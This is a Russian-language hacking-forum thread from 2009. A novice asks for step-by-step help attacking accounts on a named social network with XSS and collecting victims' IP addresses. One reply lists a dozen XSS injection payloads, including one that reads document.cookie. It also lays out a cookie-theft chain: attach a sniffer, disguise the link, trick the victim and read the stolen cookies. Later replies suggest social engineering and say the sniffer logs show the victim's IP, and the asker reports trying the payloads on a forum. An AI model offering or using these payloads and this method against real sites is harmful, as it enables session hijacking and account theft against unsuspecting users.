HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Безопасность и Анонимность
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS помогите
  #1  
Старый 11.12.2009, 11:27
sakrej1
Новичок
Регистрация: 21.11.2009
Сообщений: 11
С нами: 8669111

Репутация: 1
По умолчанию XSS помогите

Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Меня интересует что бы это работало на www.one.lv Или помогите на практике. Могу дать аккаунт для опытов, если кто решит помоч.
P.S. В гугл просьба непосылать, там кроме этой статьи ничего нет.
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
 
Ответить с цитированием

  #2  
Старый 11.12.2009, 12:10
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
С нами: 9290631

Репутация: 46
По умолчанию

если ты там ничего непонял никто тебе необъяснит там и так все подробно расписано
 
Ответить с цитированием

  #3  
Старый 11.12.2009, 12:19
root_sashok
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
С нами: 9351139

Репутация: 1593


По умолчанию

Логинься и подставляй во все поля всевозможные комбинации:

Код:
<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.

Последний раз редактировалось root_sashok; 11.12.2009 в 12:23..
 
Ответить с цитированием

  #4  
Старый 11.12.2009, 17:44
Nizhegorodets
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
С нами: 9021828

Репутация: 119
По умолчанию

Насчет IP жертвы и инфы, СИ тебе в помощь

Цитата:
http://www.social.do.am/
http://bugtraq.ru/library/misc/social.html
 
Ответить с цитированием

  #5  
Старый 11.12.2009, 19:52
DiHWO
Участник форума
Регистрация: 23.10.2009
Сообщений: 103
С нами: 8710432

Репутация: 7
По умолчанию

Цитата:
Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что.
Если чесно, я когда изучал xss тоже ничего по этой статье непонял, до меня долго доходило, надо сам смысл почувствовать. А вот про то что в гугле только одна страница - убило.
Цитата:
P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
Цитата:
Насчет IP жертвы и инфы, СИ тебе в помощь
В логах сниффера будет айпи, в поле реферер или аналогичном ему.
 
Ответить с цитированием

  #6  
Старый 12.12.2009, 12:08
sakrej1
Новичок
Регистрация: 21.11.2009
Сообщений: 11
С нами: 8669111

Репутация: 1
По умолчанию

Цитата:
Сообщение от root_sashok  
Логинься и подставляй во все поля всевозможные комбинации:

Код:
<img src="javascript:alert('XSS')"</img>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

"><script>alert(document.cookie)</script>
Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.
Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть?
P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.

Последний раз редактировалось sakrej1; 12.12.2009 в 12:51..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Помогите с Xss TRv2 Уязвимости 11 04.10.2007 16:27
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.